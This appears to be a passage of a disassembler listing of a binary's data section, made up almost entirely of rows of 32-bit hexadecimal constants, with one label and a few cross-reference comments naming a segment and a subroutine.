dd 58ABB4EAh, 0F07042D5h, 5C81DA0Ah, 0DB549B55h, 7BAE2CFEh
dd 1DA3F4EDh, 2BCD0E79h, 2B65A403h, 0F530464Eh, 7F7C3CB0h
dd 9FD2F822h, 41B17554h, 7894A884h, 2FF83795h, 0A82C84EBh
dd 0B79AF0C1h, 0D2063A7Dh, 0A8A02DB6h, 691BBFA6h, 837B5960h
dd 0FAB838FDh, 8184C9C4h, 47D7797Ah, 429B43B7h, 0D6EE2C8Ah
dd 26CE1CCCh, 0FD064A01h, 1C0D5F13h, 554AEF76h, 0A59A853Bh
dd 0AAABD2CBh, 0F9232B20h, 43F173A3h, 2EA247C9h, 0A4D2A66Fh
dd 8BC50552h, 3B14E660h, 0D03F89DAh, 6F1BCD65h, 99A20A43h
dd 0EFA7501h, 0A69F4D8Eh, 377DBF4Dh, 0C94E2239h, 842ED6E3h
dd 0EF63F76Ch, 5794AD81h, 0B454BEF6h, 75F22ADDh, 3B667FDDh
dd 18E8C2ADh, 63715B6Ch, 0F6B7D63Dh, 4DDFA38Ah, 5B7BEEA9h
dd 0CAC1DFCCh, 0AA58AD3Fh, 144EAB80h, 479671F0h, 6AB7B599h
dd 0ABC2E148h, 2C40FCD3h, 0E5BB812Ch, 4CF1F743h, 996B9C6Ch
dd 97EEC467h, 0C1013DF7h, 56DE3B31h, 857FF9F5h, 0F4ADA8B0h
dd 224A816Fh, 691CDEC8h, 0BEDA8D2h, 0A5A1C522h, 414CD68Bh
dd 39A853B4h, 0B2AEFA6Bh, 7875851Bh, 0F00EE422h, 0D0FCD13Fh
dd 0AA09E1A1h, 34BC1E87h, 10679BB9h, 550BC5F4h, 6BE8DC45h
dd 5A09DB02h, 370ABC9Ch, 0CA15880Eh, 8BBE05CAh, 4AFE7765h
dd 4E28B4CAh, 4353D68Eh, 0F65AECDDh, 0F956D541h, 0AFA2E8A5h
dd 1DA6CCDFh, 90AD5FE5h, 0C5066616h, 9FD4F51Dh, 612561FCh
dd 25D9B17Dh, 0FDCCB448h, 70D96C1Ah, 46026E3Bh, 12D9FACEh
dd 0F6F43C45h, 0D725C0C0h
dd 0D2259FACh, 0F03BB791h, 0A959A5E4h, 0D09CD196h, 13B56CF6h
dd 0A944DAAEh, 1C8DB8E2h, 1C29B646h, 3DD82F7h, 0AACBB78Dh
dd 0B443C356h, 0D24809C3h, 0FC56F4Eh, 0CE4D67DFh, 0AE527BBEh
dd 57F3A7EFh, 0D5864BC4h, 5564E534h, 6B88E023h, 0B1742B41h
dd 0AB53566Eh, 6515B015h, 0B5F0D298h, 5D03CAB6h, 9EBB3130h
dd 7977A9EAh, 944682BBh, 76A50B0Ch, 0D398BA69h, 47E1B8D0h
dd 0F0707D65h, 0B78C59E8h, 0DD3124E4h, 0A356F47Dh, 9CEF8059h
dd 0AF16DA54h, 0BBF1A29h, 0C8D295E1h, 0DB2F5F57h, 458DF70h
dd 312928A7h, 0C73E773Fh, 9C6425A1h, 98C2C8F0h, 0AF7D6D75h
dd 4F5B9967h, 59CBD3A5h, 0AAE62139h, 30254153h, 0E2B66B59h
dd 0C956605Dh, 4B44702Dh, 0BDB29CBFh, 67035F3Fh, 0E6BF08DDh
dd 1617E829h, 695C4B43h, 0E36F1875h, 0D14D1046h, 3F556FBAh
dd 0F55888FDh, 0F1E1F99Ch, 1C4C52E0h, 1E5F2B06h, 0E1D34C1Bh
dd 8F94DFF0h, 0FB6A04D3h, 0DACE8AE1h, 0A6E3BA26h, 0B83B1367h
dd 6FEF6C05h, 0C3EA5A27h, 97381F9h, 1CF3798Fh, 8DE8D739h
dd 2D3F44ABh, 92B9EB76h, 3C21E6D4h, 76A47178h, 52AF40F9h
dd 0FB479DF9h, 34D3D587h, 979A2359h, 0B457E557h, 36A707C5h
dd 0BB34746Fh, 34A74A50h, 0EC7D0BAAh, 324EDA58h, 987E5605h
dd 37456ED7h, 17F4F262h, 707CC5C5h, 0E4FD54C5h, 1BE434FEh
dd 0BC1FB5CEh, 1FD742FAh, 3A6A41FAh, 29130808h, 17144ABEh
dd 9E8B5985h, 0CDFD35B7h, 0DFE6AACBh, 2B843D90h, 0D32DB37Dh
dd 3B136CE5h, 0FD81ECCEh, 767525EEh, 30B7F064h, 224C36BEh
dd 2F3E8978h, 4A2FD36h, 9D947A62h, 2E7DB1F4h, 5A2BF62Ch
dd 9058B748h, 5D3FE715h, 48D4C1A0h, 93DCA329h, 0D0D03B54h
dd 43F1293Dh, 7AB9F9CDh, 63A7D839h, 9C58F78Fh, 6952EAEFh
dd 0C1065ED0h, 0C0F8EFDCh, 22BE5BDh, 4354FEBBh, 0B33EF9FAh
dd 83C8C628h, 0AD151D6Fh, 0C5D48DD4h, 9E0CCBA6h, 7EC51ABCh
dd 0E1ECE48Dh, 27D2B974h, 0E11FA6FAh, 3CEB480Bh, 370B7FBFh
dd 0F5D1465Eh, 0CF24CAABh, 5A237A4h, 0A1DA6B90h, 557B8445h
dd 1CAEEFE5h, 7579A521h, 7C511AB0h, 0D57CE98h, 0C8E767FFh
dd 0D699679h, 0EFC72D7Eh, 0AA4A1CEFh, 63AECD64h, 467D555h
dd 54E8139Fh, 5497DF91h, 0BACF5195h, 3AB64FF4h, 6A44B8F0h
dd 0F48C7393h, 0AD143F13h, 7CB23FE4h, 0DA86C460h, 0EB9F53BBh
dd 0B44BE1FEh, 30D6E6D6h, 3F19EA2Dh, 0C74BCF1Ch, 0E5299575h
dd 0EF021D5Ch, 37CE82D1h, 0CDF09987h, 7FBF8DD4h, 0F2E879D0h
dd 0A6E51B53h, 0B8BD72C2h, 55BF8551h, 635F691Ch, 2005BF88h
dd 422B246Fh, 775BBFE5h, 8F8B55DCh, 85FC6212h, 9CCEE629h
dd 5B8D81ADh, 44FF0784h, 815F33AEh, 9F2FA812h, 654BDA28h
dd 0B9E78E66h, 1C3E53BFh, 51F6E14h, 7ED3B01Ch, 0CB053AACh
dd 5178F9D2h, 0EBC2A3B8h, 4D189D26h, 55F325A6h, 0E2EEBF56h
dd 2BF27EF8h, 0B17A71EEh, 2BCCD145h, 0EBD73D32h, 59652FDAh
dd 86252554h, 439E1F46h, 78D3D74h, 0BF835CBFh, 0BED70791h
dd 0E08637BEh, 9DDBE66Eh, 92AB07B5h, 43BBE91Ch, 72517435h
dd 0BC0F0D3Ah, 27C23253h, 75399A5Bh, 7008CC77h, 0F812A55Fh
dd 416277Eh, 8FFD73B9h, 0B54D6C5Fh, 0A60ED2C6h, 0FD639351h
dd 6DF30751h, 901B41DCh, 0B1986FA7h, 95490FECh, 0AD85BCCAh
dd 0EA524255h, 954E707Ah, 67C34513h, 7FC3468Ah, 6E880BF9h
dd 0D10FCAA4h, 0B680F43Bh, 697BC0E6h, 0C25AD44Ah, 0FB720B48h
dd 2C53BCFAh, 4089548h, 0C5A50B5Ah, 0E7808E07h, 43F5904Fh
dd 7C0B4908h, 0D7B3F8A9h, 958696FBh, 0C76B9750h, 0E3973AC7h
dd 0C04CE741h, 0B1DF42Ch, 0E3FC71EAh, 487CC95h, 0E89FAA8Ch
dd 0E203A0ADh, 0FBEA0A96h, 35167DCFh, 99BF768Bh, 7B38E1E4h
dd 0A400DB31h, 9FC3EF5Bh, 0A5D55BDBh, 7932F1B4h, 812686D2h
dd 57688DFAh, 6DF951E2h, 907051F7h, 3051DA50h, 0A55BE511h
dd 26196862h, 0B8F759DBh, 0B4A1A03Dh, 0E8F20056h, 0FD1290AAh
dd 0B37FDF3Eh, 357BDCF7h, 0CC14B4B3h, 15259A8Bh, 0EE435B21h
dd 0BC7B66E4h, 0DDAB5E03h, 0CAD33181h, 0D802DDB6h, 0B6010377h
dd 0A9C359C8h, 75D2CD9Eh, 830FC0F4h, 0FE817F34h, 6A66C879h
dd 0BD39CAFDh, 2E8F8AB2h, 5201FDBCh, 0A065DF6Eh, 0C0636A18h
dd 0B9E2A791h, 657CCED0h, 2B04E24Dh, 601EB2FFh, 0F501E2B4h
dd 6FCD66D9h, 0F3894A0Ch, 0D0EBD829h
dword_474244 dd 0C53AAA14h, 6346AA8Ch, 82478EA2h, 83D1FDCFh, 4B9C24D5h
; DATA XREF: ut7h7i2x:0044EAC6o
; sub_45883A+13o
dd 0D9AC6EC0h, 0F338CF28h, 0BC933685h, 0CE7CA243h, 30F0C8h
dd 2ED7BBFBh, 37B6B7E9h, 0BF59A55Ah, 0AF8B30AFh, 94EFCD9Ah
dd 0F841F956h, 90AC28DCh, 0E25D877Bh, 0CDDCF48h, 685587E9h
dd 65075E1Dh, 0C623BE7Dh, 5F858F15h, 0D7F5D638h, 40E670E4h
dd 0C1F7EEEEh, 0C6234F91h, 0B2AC554h, 1E7E9544h, 0A35E80A5h
dd 6A6F0790h, 28CA7BF4h, 0A730B58h, 9141D6A6h, 6B735FDFh
dd 0C295F8E4h, 4D1BFC4Ch, 0D3B9E612h, 4FE1B221h, 0AEA25DB1h
dd 0ECE0CA44h, 0FD5F1346h, 1C4F7AB7h, 1CBC90C6h, 0DA7F7FDFh
dd 94723F13h, 0E0664768h, 0BEAC7EABh, 4057054Dh, 0ED15564Bh
dd 3D656DA6h, 0E0691F19h, 85BE2E92h, 0BF84DFBh, 0CE7A6E73h
dd 0D2FC0D7h, 756CDB3h, 0F19B2AEDh, 317B09C3h, 350F826Dh
dd 3161AEF1h, 0E9DE89D8h, 5285B9AEh, 4E899C5Eh, 11398426h
dd 0C600FE31h, 0BCBB88BAh, 0AE91B30Ah, 8AA17028h, 6B95351Ch
dd 6759524Eh, 0FABE2B45h, 0C1F04502h, 87D11FBFh, 0D47E2FCDh
dd 0D8ECFDE9h, 0ED1177A3h, 5FE90F27h, 0E8CB8552h, 192153E5h
dd 98996E6Bh, 0F8093FC2h, 0D9AF761h, 0AAAA8EA4h, 0E52C8AFh
dd 3E4152DEh, 0B6D18EE4h, 0B475EF95h, 0FAB25BC9h, 0C8CF3BEh
dd 66893A35h, 0CB3B259Ch, 564B40EDh, 0D0A587B0h, 0FC6968E7h
dd 3448EABCh, 79863DB4h, 0DA404F85h, 85BE93D5h, 745EB2D2h
dd 19103711h, 0A3CA3737h, 0A65416DAh, 557FAF31h, 0D96C2B3h
dd 0BD04EDAFh, 0B59CD32Ah, 5CD571B9h, 4BDDF9B8h, 0F40FF7CDh
dd 5FE3BAB5h, 0F5822840h, 5DDE7017h, 56B82D3Fh, 0CE5F8CBEh
dd 3F199D8Bh, 0A9E9F5E5h, 0E659781Eh, 0C80B0E72h, 85D7CDDFh
dd 0DD457437h, 62601691h, 0DECEA487h, 0A933BBC5h, 0A02BCFA3h
dd 0B8C658A6h, 2F38C985h, 0B6AD6924h, 0E07425AEh, 0AFEFF471h
dd 1379CC3Fh, 87F9D26Ah, 24BFE304h, 1DAF11BDh, 0D744D70Eh
dd 0E92C38DCh, 1F8EEFEAh, 0C3731658h, 97EAA368h, 0EADA37F0h
dd 0D71B0A7h, 399B4E17h, 0B5100D38h, 16AABDC5h, 8418F02h
dd 0B14D9A0h, 47ACEE0Bh, 83B828CEh, 4979E41Dh, 0C082F531h
dd 6D51248Ah, 5894BAC4h, 73E5FE5h, 50FB63EAh, 0DB1E05F8h
dd 75E2716Ah, 504CE97Eh, 2E18B991h, 2D0BE34Fh, 0BB13D12Ah
dd 62E97769h, 465A55F0h, 572DBEC7h, 1EC475D5h, 8B895387h
dd 0B60DC279h, 552BAD45h, 0F91D4552h, 952E8C36h, 57810249h
dd 75DE2BB9h, 551B93FCh, 0E54BCA95h, 0EE22AF66h, 7CA1A272h
dd 7D7215B0h, 0CD3AF763h, 2FC2FE2Fh, 0E6BF3B28h, 0DE6893F1h
dd 84298573h, 5CDD91D4h, 0C9D690C9h, 0C24CE3h, 0E64DBD5Dh
dd 26BCEF38h, 0FD871AC5h, 0D0FC791Bh, 0D7877CFAh, 0B9357609h
dd 58D8485Ah, 5EAE5B79h, 0CE5C2E82h, 9E360B77h, 5856D756h
dd 7C85B089h, 55A8222h, 546E048Eh, 0B7492184h, 0E8BAAB11h
dd 2BCB7AE5h, 709E932Bh, 5C94AC1Bh, 13FD889Fh, 7DF86718h
dd 0BD094992h, 0A985510Ah, 4A856B6Ah, 0F7E77FB7h, 6AF74AD1h
dd 6A33CDEDh, 0D46B917Ch, 0D13E205Fh, 7A3A4162h, 0D7009941h
dd 0B535A424h, 0AADDD4Dh, 6F160C4Fh, 0F63668ADh, 0A77D4868h
dd 4EFE1F88h, 0ABA6D72Ch, 54EF2FA2h, 16EE904Bh, 0CFB0C1E7h
dd 4E52A51Dh, 1FCAD24Ah, 57B1F558h, 1E7538ADh, 0C04E8881h
dd 2A7379C6h, 502425CDh, 0C3B4E12Bh, 0BE49AB6Dh, 0ED315AF3h
dd 0D9D920E2h, 56BF53EEh, 637CC77Ch, 0BC52D29Eh, 0B45C153Dh
dd 0C729AD57h, 0F0E1632Eh, 547444E5h, 0DF48F8DCh, 0EDFB34BFh
dd 5FE01C8Dh, 0D4A52176h, 66BEEAF1h, 144CA0DAh, 0DFFDFC38h
dd 0B31AA7A3h, 4ACBFA52h, 1F75EC90h, 0BAB3F538h, 56005735h
dd 0BF2C3FC7h, 419636B5h, 8B9D0FB6h, 0A9B3D373h, 0D2E7CC6Ah
dd 0BEAB8045h, 0D4ED177Bh, 1F224B8Bh, 0EF82184Dh, 40745B0Bh
dd 63678C7Eh, 35FD9636h, 0B5485E26h, 7FBDCA75h, 0C227420Fh
dd 4BD54100h, 0AD1C02A5h, 3E30F81Dh, 9969E0Fh, 0D66DABCCh
dd 0DCA0344Bh, 35F5ED8Bh, 0ADD86A54h, 0F179424Eh, 41124226h
dd 0FECAF0E3h, 8ADE25B9h, 0F013FF36h, 0D4AC97AFh, 0FDE9B7Dh
dd 5A0ED50Ah, 0BF8EB509h, 6D29B8C4h, 5FDDF4E5h, 0C65B0FC1h
dd 0F1036376h, 0BA4B8316h, 17DE8799h, 3F7203E3h, 69374BEFh
dd 6D890ACAh, 0B63C7C9Eh, 125A74DAh, 776025D5h, 0BAACE7FDh
dd 0A447ACE3h, 0AD1F40C4h, 273D5774h, 0DDC6740Ah, 0DA3A086Eh
dd 0FB3D5E8Ch, 7E7EFF65h, 589CB2F8h, 0F81F7377h, 0C9E3653Ch
dd 0ACA49DAFh, 0C66BAFAEh, 936A7730h, 3A0B68DAh, 0D4E571Fh
dd 0C29A4234h, 895893F1h, 12A8F271h, 1BA9B369h, 7EEA4EEDh
dd 0AC394AEh, 0E4425AE7h, 0EB745FD3h, 0BBEE7645h, 0F96C7142h
dd 0A94B5CE9h, 6EABBECAh, 4D209196h, 0F5888B52h, 771EBB55h
dd 0A22B900Bh, 0EB953C0Fh, 9C0CF0A4h, 176704Dh, 76851EDBh
dd 46D3C309h, 0D4FF4E06h, 1527975Ah, 1AF962A1h, 0E52BD5B5h
dd 0DC2AB4A0h, 3522010Bh, 6251D401h, 0C5F9D3F9h, 5FC540B9h
dd 0ED1CF519h, 0BC3EF495h, 0FD1F651Ah, 0BE2C953Ch, 792BAE22h
dd 0F1327E12h, 507682AEh, 54441D01h, 0F0A0C47Eh, 0AFF43435h
dd 3F2C28Dh, 63DFA437h, 0F45DA047h, 0ACC6589Ah, 746BDB94h
dd 0B5571BF2h, 0BB344323h, 0F479748Eh, 0D6C2108Dh, 0B44B40A4h
dd 833AF9Ch, 0E57F35BFh, 0AD0975A7h, 0AE4FB892h, 56A15556h
dd 25E382FAh, 3C3B7049h, 86140D6Fh, 80B683C6h, 0C0FAE745h
dd 9BB413F9h, 628FF1D1h, 5AD17945h, 4B4DEDE3h, 0EFF53977h
dd 358DCB10h, 356C506h, 0C4AEA2FDh, 0FF6C1D20h, 3B2785Eh
dd 0BD88AFBEh, 0D6E39F1Bh, 3B28D19Ch, 5E1BE4A5h, 174A0545h
dd 663ABED9h, 0CE2E74DDh, 88923F3Ah, 77383CACh, 324BBBFEh
dd 5669D7C5h, 24FE232Fh, 0C11BC223h, 0E07B716Bh, 4C9B22CFh
dd 0BAFA31BAh, 1950C205h, 0D67575A2h, 0BAFEFA6Ah, 3FD13DD1h
dd 0BE5C107Ch, 8809CB2Fh, 0E6AA1BB4h, 78F8F169h, 0F2756358h
dd 97BB0AD2h, 16853B46h, 132451E3h, 81F1AAFFh, 53AB566Bh
dd 0F66FDD60h, 90FCBAAFh, 0DCF9597Dh, 1C543F25h, 73032D13h
dd 392ED3EAh, 3395A48Dh, 4410907Ah, 5637014Ah, 472F065Fh
dd 88960286h, 0FB55E092h, 4814E1C4h, 687DB577h, 0A9795591h
dd 642020D4h, 0DE77F67Fh, 93FB96FDh, 0FC71D8Bh, 0AF09E127h
dd 2EAA6921h, 2D429EF5h, 115F8DA2h, 0E33DE22Bh, 0C657DEB6h
dd 0BE11E0D2h, 0A7DC587Bh, 7B2EC051h, 0D6198397h, 4F9A029Ch
dd 0D19DB24Bh, 155A6824h, 391BFC3Fh, 0AEAEAAB4h, 757D5228h
dd 8E0C8B61h, 0A5F0F8Fh, 897BBDD7h, 0DA20D3C0h, 0C38BACC5h
dd 35C7D078h, 0EA879340h, 96B052C8h, 8BCEAEFFh, 0B3FC6148h
dd 0FE9E6AABh, 750D5327h, 0D1716956h, 0CA30708Ah, 0D1A52AB4h
dd 786D604Fh, 0FA0B9DDDh, 0BD54C06Ah, 0DA279A09h, 2C19ECB1h
dd 1BF370FFh, 894D5DC6h, 0AF661AC2h, 168F2A3Ch, 0B3BA16A9h
dd 4AEAC244h, 4B61135Eh, 0F1E7C908h, 6FF1BDC0h, 68BF3C5Bh
dd 0ABA2DE17h, 63590557h, 260A5F1Eh, 8D4719DFh, 0AFBE0C5Fh
dd 95CE2F57h, 3DFDB916h, 0A37EA2F0h, 69D4F6EBh, 926E8A49h
dd 0FFDE82D9h, 0DE639B18h, 4DDAD5A1h, 5E6B4A6Ch, 8F545ECDh
dd 8C864FA9h, 2A046AD6h, 0D8D9A7C5h, 0CC365FB4h, 1B7FE51h
dd 0F6DBFE99h, 0F5E15D80h, 6CE1B5FBh, 88D2F80Eh, 36846D14h
dd 0DD417871h, 5044CFCh, 7DF62D1h, 0E979CAD6h, 6F29739Dh
dd 436D20D2h, 71D2BDFAh
dd 7EE59F20h, 9DED4BA5h, 67CED221h, 3CFA1B1Fh, 8CEEE07Ah
dd 0FA8B1D13h, 931427A2h, 0F42073F6h, 2AB6A2C7h, 691453D6h
dd 4D524529h, 0A934BA3Ah, 3BE5E22Eh, 0F307DE6Ch, 67CCEA78h
dd 2D273078h, 27348226h, 5C05B038h, 387E68F5h, 0D6536DFFh
dd 81AE27EFh, 0BAA25A89h, 0D0F9EFA2h, 8C14499Ch, 64B7EB36h
dd 803105E6h, 79B6FB9Ah, 0DE830E31h, 1A6D97E3h, 5A15D313h
dd 0A9A1D29Ah, 97447557h, 12CA22C8h, 0C794AAE8h, 0E8797C9Fh
dd 0A219E175h, 79EFFE25h, 1C52070Fh, 5FE1A157h, 19569F87h
dd 1327BD09h, 0B16775B8h, 4254FECCh, 0BCD23390h, 0F029AD42h
dd 8C0FDBA5h, 7A9DB192h, 58589AD5h, 0F47CA5Dh, 0FF0AF857h
dd 7C17AC6Eh, 57EC65ADh, 4B1BA9D1h, 2EE99C9Dh, 4C8644E8h
dd 0BFF4109Fh, 98F02702h, 18FF0959h, 4CF3860h, 89A2CDAAh
dd 0DC7286A9h, 0A9FDFD2Ch, 6D10AEC3h, 0C2C4F7F8h, 67BB1ADCh
dd 8E3BF48Dh, 0AE12AFF0h, 0D45729C4h, 705014AFh, 0CF781AAFh
dd 7F80F8F4h, 0D13A5B55h, 0BCD359F2h, 77819911h, 0DA246305h
dd 379528A9h, 3673760Ch, 20BF5E51h, 0E6E9BF1Fh, 16670FA3h
dd 0FAE140C2h, 4769E8E0h, 2C7FB0FCh, 0D94DF5AAh, 3CBBD68Ch
dd 1B2AD9ECh, 84D35FD5h, 0F8AACACDh, 7EA7CB52h, 675FA35Ah
dd 0A5BACAB2h, 7B5B9D5h, 0E7DF688Eh, 66158BB3h, 4BA9BDACh
dd 85D057DAh, 12FC9A90h, 6C238DA4h, 0BE5AE71Ah, 9E4AEAB5h
dd 0F4943A28h, 9063C277h, 9E078D56h, 0DAE23F7Fh, 0FC5EAFCFh
dd 0EE3E3710h, 29F7171Eh, 6C6FB3F7h, 9C9E4E4h, 873C86C9h
dd 0A77F024Dh, 729CBE3Ch, 18F72AFCh, 1F56DAB0h, 1FEBB578h
dd 0D4CB0B43h, 0B0A95A26h, 0AA567C9Ah, 98E72BCFh, 73B30183h
dd 6C879CC7h, 9B1C2BAFh, 5752B675h, 4A316BFDh, 698648A3h
dd 424B55C0h, 0CEE25CD5h, 1F05FD54h, 633DE638h, 3AB6BB60h
dd 0C98E2BEFh, 6190B635h, 0BA6AB467h, 0FD0FD96Bh, 711586BBh
dd 0F3858BD2h, 0D86322D3h, 0D41A8DACh, 600B097Dh, 4676CD5h
dd 99BD2A72h, 0E74A9D13h, 0AD70C2B9h, 0BE0FF88Eh, 457F4487h
dd 555E41DCh, 8376B74Bh, 0A8CAD16Eh, 4725AB6Eh, 0E37A4141h
dd 0D6E2FB87h, 2D189615h, 0FB029E9Fh, 0A40CED86h, 0A52BABC5h
dd 1F7B72Fh, 2CCF5CCh, 0D2A091DFh, 27DBA7EEh, 41A2384Fh
dd 90C9D7D1h, 0E59D1404h, 54BDA63Bh, 2125959Bh, 0E383A9A0h
dd 0B8ABC3Eh, 6C205F01h, 7E02E8FFh, 7EF035A8h, 0C5AD0F8Dh
dd 0DEB52838h, 0AB9613E5h, 0A47408Eh, 9502F637h, 325FF812h
dd 7EEB47A9h, 9CD2143Dh, 66752118h, 0AA84EC1Bh, 75CE123Eh
dd 0BF3CAA58h, 8B9C2DA4h, 3252D987h, 8AFCFAA2h, 6D0CB176h
dd 8855A639h, 0EF7A0F41h, 8757CF5Ch, 864A9342h, 7D88729h
dd 0E76E5F99h, 0DF2BB4A0h, 96961B79h, 6956C5F4h, 6D97AE91h
dd 0AB01B443h, 0CE33C9E2h, 0E32A9EACh, 36E239F7h, 1D9FAF1Ah
dd 0AA5CD63Ch, 0B57F5BE1h, 0BD35F410h, 0C4FB1A0Dh, 464355E3h
dd 5A23F481h, 85D8ADCEh, 0ECDC1485h, 5625681Fh, 34C15D45h
dd 0A8846D95h, 0D47EB0BFh, 0C062D405h, 0D040B80Dh, 0CE57B354h
dd 0ABF5C2AAh, 0BAABEFD8h, 96251DBDh, 2EDDE7Dh, 0F81E5271h
dd 0FE78D6E1h, 6ADC55BDh, 0F3DE520Fh, 648152F2h, 0E4DAAA8Fh
dd 804CD5E3h, 0C15A6154h, 0BFDE0948h, 0CAF735B4h, 6D1295EEh
dd 860DE667h, 707CFD5Ah, 7E23E5B8h, 7FCAF0B8h, 0B6C0F11Dh
dd 0FE6EE4F6h, 1F89457Ch, 0DD72A54Eh, 0A6E1D66Ah, 0A59D9D81h
dd 9FD0C976h, 4D837461h, 8F7074FBh, 0F854EEFBh, 0C5481A9Bh
dd 0D8D38430h, 2537915Fh, 9C7A975Ah, 37F513ECh, 0A55140ABh
dd 5A2D7AD4h, 0C535D2F0h, 25BF3708h, 59575651h, 87680AFDh
dd 0B4025B0Eh, 9858B25Eh, 6C9406BBh, 751DE4DBh, 8CF98F6Dh
dd 5FDCA3CEh, 0DA45B349h, 0E01A1876h, 0D5CA03E9h, 5E57FA33h
dd 0E6942F6Ah, 0B46003F0h, 0CA158E9Ch, 0EB68A13Eh, 0C6846177h
dd 0B31A94A6h, 114B59DFh, 1BEF4307h, 22827E99h, 57736950h
dd 5BBEFE41h, 2B1EB801h, 0B817DD7Fh, 263272F1h, 64B7BB46h
dd 0FCC4A51Bh, 8E6CA1C1h, 0E1DF087Dh, 1603DC27h, 0EB983DDBh
dd 70620EF9h, 0A0E0702Dh, 0F0CA55E5h, 0DC1E63F5h, 87DB7B95h
dd 91D4F2BEh, 68EAE7BAh, 288DB83Ch, 5FCDC005h, 7E757F3Ch
dd 11F2EF82h, 0A8A415Bh, 4E836266h, 0DFE8154Dh, 4BDF394h
dd 0D490DD50h, 7C1664ECh, 0BE6BE9BCh, 0A21947BFh, 0BF68A2B5h
dd 1530FAABh, 319CCFA4h, 0EA6584B6h, 0C567D320h, 1AA1B592h
dd 692BBB21h, 0FB01349Bh, 0AEAACAB3h, 18B66CF6h, 948DDF6Ch
dd 0D543768h, 0E51A65A8h, 5DC07738h, 0AD539ABFh, 8DDA579Eh
dd 344669B1h, 14A57D30h, 1950E568h, 0E1C4262h, 58440AE8h
dd 55410577h, 7E10B8DAh, 4B09987Fh, 7BA11C0Fh, 0E6756AA8h
dd 230BF8CEh, 5FD67F61h, 357C805h, 0C954F54Ah, 0E7343EF7h
dd 7F339D36h, 338F1DE7h, 0EF907853h, 0A60F5C27h, 9416AAE7h
dd 0EFEA8704h, 6951F83h, 308ADF4Bh, 0B1251E76h, 3250D577h
dd 2CBFF45Fh, 8B323FD5h, 0CD25BED3h, 0A2C4E155h, 55099D7Ah
dd 20497DD5h, 38704BF9h, 8BD1D1D2h, 82141A2Ah, 0A0A54E0Fh
dd 3F06C137h, 4C250F61h, 0A6BCDC7Ch, 0D43761B0h, 0E0294D7Ch
dd 57C86273h, 536C95C3h, 510A5C9Dh, 9BB6D355h, 0D5D5F5F3h
dd 56818465h, 46A3CDCh, 27BB2BEh, 0BD9A15C7h, 0C9C27BD3h
dd 74E15471h, 2DC1374Eh, 0D895AF63h, 15E58B7Fh, 0EE1D92CFh
dd 7511B6D9h, 0D37DC191h, 5F159B19h, 5F0241E4h, 7516C83Dh
dd 0FF7234AAh, 2BC467DCh, 1A555CFFh, 2222BBAFh, 83BEAE0Fh
dd 2D493313h, 0E6425A86h, 4978B6A9h, 7011B71h, 0F1D05506h
dd 0AB9C1143h, 0B9BE4439h, 56B9A1BEh, 0CFD512A7h, 6ADEF58Ch
dd 0B0B2FC28h, 0FDF167F9h, 5D65B061h, 7D7C1F04h, 0F6651042h
dd 91DFB03Dh, 0C60CD892h, 21E02FF4h, 98DA8960h, 9C262BD0h
dd 91E826B3h, 37FBD9FCh, 0E43BDC7h, 52D05C65h, 8A56296Fh
dd 0DD65893Fh, 796B95F9h, 0AD832Bh, 669EE4C7h, 5348A395h
dd 0DF7EECD5h, 0B3E89C71h, 0ED40AC48h, 23640364h, 3622532Bh
dd 0AB26C5AEh, 0C7FD98C7h, 0B6068169h, 97035FF9h, 48F39DDEh
dd 814BC1F1h, 35551B55h, 51A6C1Eh, 1F8F79D4h, 83671536h
dd 83AFF1E7h, 26EDD8Bh, 301BDD2h, 2AFA9D60h, 6F2E1DAFh
dd 36A23E98h, 0F72595F6h, 0D5951F27h, 39910EAAh, 63371B84h
dd 0A9007FCBh, 7C8FBE3Ah, 951B6B2Dh, 0D7A45172h, 7AFD9CD1h
dd 0F23D0ABEh, 0AA1BB46Ah, 0DED1DF23h, 7CE6BB3Eh, 692B18F3h
dd 0C02CCAF1h, 8144DA1Dh, 1732AC46h, 4CA9EE8Bh, 0EEA01DAh
dd 0FB68FEE1h, 77EE31EFh, 81ABDC1Ah, 7ABAC35Ah, 76D7F4ABh
dd 3E031A37h, 5F068976h, 88058BECh, 0B465AA45h, 607C65EEh
dd 9D9483B5h, 0B13E389Ch, 0C279943Ch, 5580FBB2h, 847E622Bh
dd 0FA5EA1BAh, 6C526B45h, 675BB21h, 0CAA51FEBh, 4DB25DE5h
dd 0E04E68F7h, 6174F436h, 29DA9060h, 58089075h, 31277D34h
dd 13A5D7E3h, 0B461DDC0h, 0E86B4093h, 30A6C9C1h, 0DE32B970h
dd 77F7F66Eh, 7142FF9Eh, 9DE5A566h, 0A246B8D7h, 9D687C37h
dd 6264CD3Fh, 52ACED52h, 23755AECh, 0CAE3936Dh, 0E15E7B44h
dd 0DC0D4444h, 0E136E1F8h, 2279D427h, 4811B6E7h, 940E9EBEh
dd 0B26C3ED6h, 73F6F0E8h, 4A6A1FCDh, 6C4CCDACh, 0E14A5554h
dd 0E0C376A8h, 0DDC86775h, 2E1A973Ch, 56F8756Ah, 369B8D66h
dd 2E490BA5h, 552D8986h
dd 52A63C5Bh, 72FC1F5Dh, 5567D261h, 0DDB735DEh, 31BDAC91h
dd 3742130Bh, 1D9D3AF7h, 4C176DCAh, 0ECE28F68h, 0B6A8C54Bh
dd 0E6F0D72Bh, 0EF548D76h, 0ECD9501h, 96A287F9h, 0BCD18F14h
dd 3CF9AAFCh, 859E043Ah, 3C68D2F6h, 0EB715D5Ch, 39137AACh
dd 66C8D605h, 0E62BEC2Eh, 599DFACDh, 8DAEA331h, 36B4257Bh
dd 74FAA9E9h, 0C4AB4A36h, 5F433048h, 526BCE2Ch, 516A0DB4h
dd 1A20F9E5h, 4748DF56h, 0C8EABCCEh, 0EBA79537h, 28DA385Fh
dd 4E497B71h, 0A088F169h, 0FEE4E603h, 944A7B8Bh, 0F70F4356h
dd 0B95517D1h, 0A56AF3FDh, 0C8A87C72h, 3A6EEFDFh, 0C7CA3562h
dd 984E1E5h, 25A93749h, 1F864122h, 8086BE0Ch, 53680FB0h
dd 0A6D58DBEh, 0B3DFB5CAh, 0B52975CAh, 74E7D4A2h, 356AF8B0h
dd 5430FE4h, 2E12CB39h, 0D38EF07Ah, 12A9EAF4h, 0DED1ACBFh
dd 2ED2EF57h, 2A18C5F3h, 1F37752Bh, 0A570B613h, 0D53C53D5h
dd 0E0A627F9h, 85E5605Bh, 0B64600B7h, 9DFB3B8Dh, 53A4CBFCh
dd 93F97789h, 84A90ABAh, 64321B55h, 0D96A3E79h, 42876D0Eh
dd 0DAE25439h, 0AC6004E2h, 70FF9168h, 4E05CBE1h, 0A08CA51Fh
dd 0FB52E497h, 68DA0FBBh, 3C504439h, 135DC117h, 0A09A8F03h
